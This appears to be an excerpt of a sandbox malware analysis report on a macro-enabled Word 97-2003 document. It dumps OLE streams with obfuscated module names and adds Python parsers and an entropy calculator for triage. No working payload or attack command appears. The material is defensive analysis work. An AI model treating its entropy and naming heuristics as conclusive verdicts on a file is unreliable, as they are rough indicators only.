                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_Base
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: UserForm5, Stream Size: 1160
                                                                                                                              General
Stream Path: Macros/VBA/UserForm5
VBA File Name: UserForm5
Stream Size: 1160
                                                                                                                              Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 f9 39 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              VBA File Name: Vhr7vb1s1hgs, Stream Size: 681
                                                                                                                              General
Stream Path: Macros/VBA/Vhr7vb1s1hgs
VBA File Name: Vhr7vb1s1hgs
Stream Size: 681
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 11 c0 94 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VBA Code

                                                                                                                              Streams

                                                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                              General
Stream Path: \x1CompObj
File Type: data
Stream Size: 114
Entropy: 4.2359563651
Base64 Encoded: True
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
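What the 114 bytes above encode, as an added example that is not code from the Joe Sandbox report: a parser for the CompObj stream laid out as MS-OLEDS describes it, plus the Shannon entropy calculation behind the report's Entropy field, both run on the stream's own Data Raw bytes. Assumptions: the key names of the returned dictionary are ours, and reading the CLSID out of the 20 reserved header bytes relies on how Office writes this stream rather than on the specification text.

```python
"""Decode the \\x1CompObj stream of the analysed document and recompute its entropy.

Added example; not code from the Joe Sandbox report. COMPOBJ_BYTES is the
114-byte "Data Raw" dump printed above. The field layout follows the
CompObjStream structure in MS-OLEDS; the dictionary key names are ours.
"""
import math
import struct
import uuid
from collections import Counter

# The complete stream as dumped in the report (Stream Size: 114).
COMPOBJ_BYTES = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 "
    "00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 "
    "37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f "
    "72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e "
    "38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00"
)
REPORTED_ENTROPY = 4.2359563651  # the Entropy value the report prints for this stream
UNICODE_MARKER = 0x71B239F4      # MS-OLEDS: introduces the optional Unicode strings


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for constant data, 8.0 at most)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def _ansi_string(buf: bytes, off: int):
    """LengthPrefixedAnsiString: u32 byte length (NUL included), then the text."""
    (length,) = struct.unpack_from("<I", buf, off)
    off += 4
    raw = buf[off:off + length]
    if len(raw) != length:
        raise ValueError("stream truncated inside a LengthPrefixedAnsiString")
    return raw.rstrip(b"\x00").decode("latin-1"), off + length


def _clipboard_format(buf: bytes, off: int):
    """ClipboardFormatOrAnsiString: 0 = none, 0xFFFFFFFE/FF = u32 standard id, else a string."""
    (marker,) = struct.unpack_from("<I", buf, off)
    if marker == 0:
        return None, off + 4
    if marker in (0xFFFFFFFE, 0xFFFFFFFF):
        (fmt_id,) = struct.unpack_from("<I", buf, off + 4)
        return fmt_id, off + 8
    return _ansi_string(buf, off)


def _unicode_string(buf: bytes, off: int):
    """LengthPrefixedUnicodeString: u32 length in UTF-16 code units, then the text."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    return buf[off:off + 2 * n].decode("utf-16-le").rstrip("\x00"), off + 2 * n


def parse_compobj(buf: bytes) -> dict:
    """Return the object identity recorded in a CompObj stream."""
    if len(buf) < 28:
        raise ValueError("CompObj header is 28 bytes")
    reserved1, version, _reserved2_head = struct.unpack_from("<III", buf, 0)
    if reserved1 != 0xFFFE0001:
        raise ValueError("bad CompObj signature %#x" % reserved1)
    # MS-OLEDS marks bytes 8..28 as reserved; Office writes 0xFFFFFFFF followed by
    # the CLSID of the storage's class there, and that is what we decode (assumption).
    clsid = uuid.UUID(bytes_le=buf[12:28])
    off = 28
    user_type, off = _ansi_string(buf, off)          # AnsiUserType
    clip_fmt, off = _clipboard_format(buf, off)      # AnsiClipboardFormat
    prog_id, off = _ansi_string(buf, off)            # Reserved1: carries the ProgID
    marker = 0
    if off + 4 <= len(buf):
        (marker,) = struct.unpack_from("<I", buf, off)
    unicode_user_type = unicode_clip_fmt = ""
    if marker == UNICODE_MARKER:
        off += 4
        unicode_user_type, off = _unicode_string(buf, off)
        # Zero-length here; the standard-id marker form of this field is not handled.
        unicode_clip_fmt, off = _unicode_string(buf, off)
        _, off = _unicode_string(buf, off)           # Reserved2 (Unicode ProgID)
    return {
        "version": version,
        "clsid": str(clsid),
        "user_type": user_type,
        "clipboard_format": clip_fmt,
        "prog_id": prog_id,
        "has_unicode_block": marker == UNICODE_MARKER,
        "unicode_user_type": unicode_user_type,
        "unicode_clipboard_format": unicode_clip_fmt,
        "bytes_consumed": off,
    }


if __name__ == "__main__":
    info = parse_compobj(COMPOBJ_BYTES)
    for key, value in info.items():
        print(f"{key:>25}: {value}")
    print(f"{'entropy':>25}: {shannon_entropy(COMPOBJ_BYTES):.10f} "
          f"(report: {REPORTED_ENTROPY})")
```

Run stand-alone it prints CLSID 00020906-0000-0000-c000-000000000046, user type "Microsoft Word 97-2003 Document", clipboard format "MSWordDoc" and ProgID "Word.Document.8", so the root storage's class is a plain Word 97-2003 document; all 114 bytes are consumed, the last twelve being three empty Unicode strings. The entropy comes out at the value the report prints (4.2359563651). Around 4.2 bits per byte is what short structured metadata with ASCII strings and zero padding looks like, so this figure by itself says nothing about packing or encryption; a compressed or encrypted payload sits close to 8.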
                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                              General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 4096
Entropy: 0.252421588676
Base64 Encoded: False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 496
                                                                                                                              General
                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                              File Type:data
                                                                                                                              Stream Size:496
                                                                                                                              Entropy:3.89869601257
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
Stream Path: 1Table, File Type: data, Stream Size: 7231
Entropy: 5.85333738879
Base64 Encoded: True
Data ASCII: . . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw: 0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99195
Entropy: 7.38970239713
Base64 Encoded: True
Data ASCII: { . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . . . . . . D . . . . . S . . F . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . .
Data Raw: 7b 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 894
Entropy: 5.30543445279
Base64 Encoded: True
Data ASCII: I D = " { 9 E 7 4 B F 6 0 - 7 1 9 9 - 4 B 1 2 - B 7 4 3 - 4 4 A 8 F B E E D 2 3 6 } " . . D o c u m e n t = D k 5 a t t 0 c u _ 9 j s b / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = L x v i n h y q 0 h u 0 i . .
Data Raw: 49 44 3d 22 7b 39 45 37 34 42 46 36 30 2d 37 31 39 39 2d 34 42 31 32 2d 42 37 34 33 2d 34 34 41 38 46 42 45 45 44 32 33 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 278
Entropy: 3.75500935024
Base64 Encoded: False
Data ASCII: D k 5 a t t 0 c u _ 9 j s b . D . k . 5 . a . t . t . 0 . c . u . _ . 9 . j . s . b . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . L x v i n h y q 0 h u 0 i . L . x . v . i . n . h . y . q . 0 . h . u . 0 . i . . . V h r 7 v b 1 s 1 h g s . V . h . r .
Data Raw: 44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 00 44 00 6b 00 35 00 61 00 74 00 74 00 30 00 63 00 75 00 5f 00 39 00 6a 00 73 00 62 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72

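The PROJECTwm dump above is the VBA project's module-name table: each module name appears once as an ANSI string and once as UTF-16LE, which is why the ASCII rendering shows every name twice, the second time with a dot between letters. The following decoder is an added example and not part of the Joe Sandbox report or of the sample; the stream it parses is constructed from the eight names the dump lists (Dk5att0cu_9jsb, UserForm1 to UserForm5, Lxvinhyq0hu0i, Vhr7vb1s1hgs), and its length works out to the 278 bytes the report gives for the stream, which is a useful check that nothing in the table was missed. The record layout follows MS-OVBA; the code page is assumed to be cp1252.

```python
# Added example, not part of the Joe Sandbox report: decode a VBA PROJECTwm
# stream into its module-name table. Per MS-OVBA the stream is a run of
# records, each an ANSI module name (NUL-terminated) followed by the same
# name in UTF-16LE (terminated by a 0x0000 code unit), closed by one final
# 0x0000. Sample input below is constructed from the names the report lists.


def build_projectwm(names, encoding="cp1252"):
    """Serialise module names into PROJECTwm bytes (used to build sample input)."""
    out = bytearray()
    for name in names:
        out += name.encode(encoding) + b"\x00"
        out += name.encode("utf-16-le") + b"\x00\x00"
    out += b"\x00\x00"  # end-of-table terminator
    return bytes(out)


def parse_projectwm(data, encoding="cp1252"):
    """Return [(ansi_name, unicode_name), ...]; raise ValueError if malformed."""
    records = []
    pos = 0
    while True:
        if pos + 2 > len(data):
            raise ValueError("stream ends before the 0x0000 terminator")
        if data[pos:pos + 2] == b"\x00\x00":
            return records
        nul = data.find(b"\x00", pos)
        if nul < 0:
            raise ValueError("unterminated ANSI module name")
        ansi = data[pos:nul].decode(encoding)
        pos = nul + 1
        # Scan the UTF-16LE name two bytes at a time so a 0x00 byte inside a
        # code unit (e.g. U+0100) is not mistaken for the terminator.
        end = pos
        while data[end:end + 2] != b"\x00\x00":
            end += 2
            if end + 2 > len(data):
                raise ValueError("unterminated Unicode module name")
        unicode_name = data[pos:end].decode("utf-16-le")
        records.append((ansi, unicode_name))
        pos = end + 2


def is_well_formed(data):
    """True if every record decodes and the ANSI and Unicode names agree."""
    try:
        return all(a == u for a, u in parse_projectwm(data))
    except ValueError:
        return False


def module_names(data):
    """ANSI module names in stream order."""
    return [ansi for ansi, _ in parse_projectwm(data)]


# Constructed sample: the names the report shows for Macros/PROJECTwm.
SAMPLE_NAMES = ["Dk5att0cu_9jsb", "UserForm1", "UserForm2", "UserForm3",
                "UserForm4", "UserForm5", "Lxvinhyq0hu0i", "Vhr7vb1s1hgs"]
SAMPLE_PROJECTWM = build_projectwm(SAMPLE_NAMES)

if __name__ == "__main__":
    print(len(SAMPLE_PROJECTWM), "bytes")  # 278, the size the report lists
    for ansi, uni in parse_projectwm(SAMPLE_PROJECTWM):
        print(f"{ansi!r:20} {uni!r}")
```

The names that are neither the document module (Dk5att0cu_9jsb, per the PROJECT stream's Document= line) nor a UserForm are the ones to pull code from first; here that is Lxvinhyq0hu0i, which PROJECT lists as Module=, and Vhr7vb1s1hgs.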
Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
Entropy: 3.61064918306
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

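Two \x1CompObj streams are dumped in full on this page: the document root's (the 114-byte dump just before \x5DocumentSummaryInformation, which names Word.Document.8) and the 97-byte one above under Macros/UserForm1, which every embedded Forms 2.0 UserForm carries with a null CLSID. The parser below is an added example, not part of the Joe Sandbox report; it follows the CompObj layout in MS-OLEDS (header with CLSID, then the ANSI user type, clipboard format and ProgID strings, then the Unicode marker) and recomputes the report's per-stream Entropy figure, which for the UserForm1 stream comes out as the 3.6106 shown, confirming the field is plain Shannon entropy in bits per byte. Both byte strings are copied from the report's Data Raw dumps.

```python
import math
import struct
import uuid
from collections import Counter

# Added example, not part of the Joe Sandbox report: parse an OLE \x01CompObj
# stream (layout per MS-OLEDS) and recompute the per-stream entropy figure the
# report shows. Both streams are the complete "Data Raw" dumps from the report.

# Document root \x01CompObj (114 bytes): identifies the container as Word.
WORD_COMPOBJ = bytes.fromhex("""
01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46
20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44
6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f
72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00
00 00
""")

# Macros/UserForm1/\x01CompObj (97 bytes): an embedded Forms 2.0 UserForm.
FORMS_COMPOBJ = bytes.fromhex("""
01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00
10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00
00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
""")

UNICODE_MARKER = 0x71B239F4  # MS-OLEDS: present when the Unicode strings follow


def _u32(data, pos):
    if pos + 4 > len(data):
        raise ValueError("truncated CompObj stream")
    return struct.unpack_from("<I", data, pos)[0]


def _ansi_string(data, pos):
    """LengthPrefixedAnsiString: u32 byte count (NUL included), then the bytes."""
    length = _u32(data, pos)
    pos += 4
    raw = data[pos:pos + length]
    if len(raw) != length:
        raise ValueError("truncated ANSI string")
    return raw.rstrip(b"\x00").decode("latin-1"), pos + length


def parse_compobj(data):
    """Decode the header and the three ANSI strings of a CompObj stream."""
    if len(data) < 28 or data[:4] != b"\x01\x00\xfe\xff":
        raise ValueError("not a CompObj stream")
    version = _u32(data, 4)                       # 0x0A03 for every Office version
    clsid = uuid.UUID(bytes_le=data[12:28])       # CLSID of the embedded object
    pos = 28
    user_type, pos = _ansi_string(data, pos)
    # ClipboardFormatOrAnsiString: 0xFFFFFFFF / 0xFFFFFFFE means a numeric
    # clipboard format id follows; any other value is a string length.
    marker = _u32(data, pos)
    if marker in (0xFFFFFFFF, 0xFFFFFFFE):
        clip = _u32(data, pos + 4)
        pos += 8
    else:
        clip, pos = _ansi_string(data, pos)
    prog_id, pos = _ansi_string(data, pos)        # Reserved1; holds the ProgID when set
    has_unicode = pos + 4 <= len(data) and _u32(data, pos) == UNICODE_MARKER
    return {
        "version": version,
        "clsid": str(clsid),
        "user_type": user_type,
        "clipboard_format": clip,
        "prog_id": prog_id,
        "unicode_marker": has_unicode,
    }


def shannon_entropy(data):
    """Bits per byte, the figure the report shows as "Entropy" for each stream."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    for label, blob in (("root CompObj", WORD_COMPOBJ), ("UserForm1 CompObj", FORMS_COMPOBJ)):
        print(label, parse_compobj(blob), f"entropy={shannon_entropy(blob):.11f}")
```

The root stream's CLSID 00020906-0000-0000-c000-000000000046 is the Word 97-2003 document class, consistent with the .doc container; a root CompObj that names a different class than the file extension suggests is worth a second look. Because the entropy routine reproduces the report's value, the same thresholds (the Data stream at 7.39 versus the near-zero property streams) can be applied to stream dumps from other tools.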
Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
Entropy: 4.62034133633
Base64 Encoded: True
Data ASCII: V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw: 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
Entropy: 1.54052096453
Base64 Encoded: False
Data ASCII: . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
Entropy: 0.0
Base64 Encoded: False

Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
Entropy: 3.61064918306
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
Entropy: 4.62970308443
Base64 Encoded: True
Data ASCII: V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw: 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
Entropy: 1.54052096453
Base64 Encoded: False
Data ASCII: . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
Entropy: 0.0
Base64 Encoded: False

Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
Entropy: 3.61064918306
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
